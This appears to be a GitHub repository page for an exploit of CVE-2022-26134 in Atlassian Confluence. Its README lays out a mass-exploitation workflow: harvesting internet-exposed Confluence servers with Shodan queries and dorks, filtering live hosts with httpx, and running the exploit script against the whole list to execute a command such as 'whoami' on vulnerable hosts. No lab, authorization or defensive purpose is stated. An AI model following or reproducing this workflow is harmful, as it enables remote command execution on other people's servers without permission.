Skip to content

prithviii10/CVE-2022-26134

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2022-26134

  1. First run the shodan scripts to grabs all the ips

    python3 shodan_script.py -API your_api -L limit -D "http.favicon.hash:-305179312 200" > log.txt

    ex: python3 shodan_script.py -API xxxxxxx -L 10 -D "http.favicon.hash:-305179312 200" > log.txt

  2. For all valid ips :

    cat log.txt | httpx -o forexploits.txt

  3. Run Exploit against the list "forexploits.txt" :

    python3 CVE-2022-26134.py forexploits.txt "whoami"

    which prints the ip and command for vulnerable hosts.

Shodan_Dorks for CVE-2022-26134

http.component:"atlassian confluence"

http.favicon.hash:-305179312"

http.title:"Log In - Confluence" 200

http.component:"atlassian confluence" http.title:"Log In - Confluence" 200

http.favicon.hash:-305179312 200

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%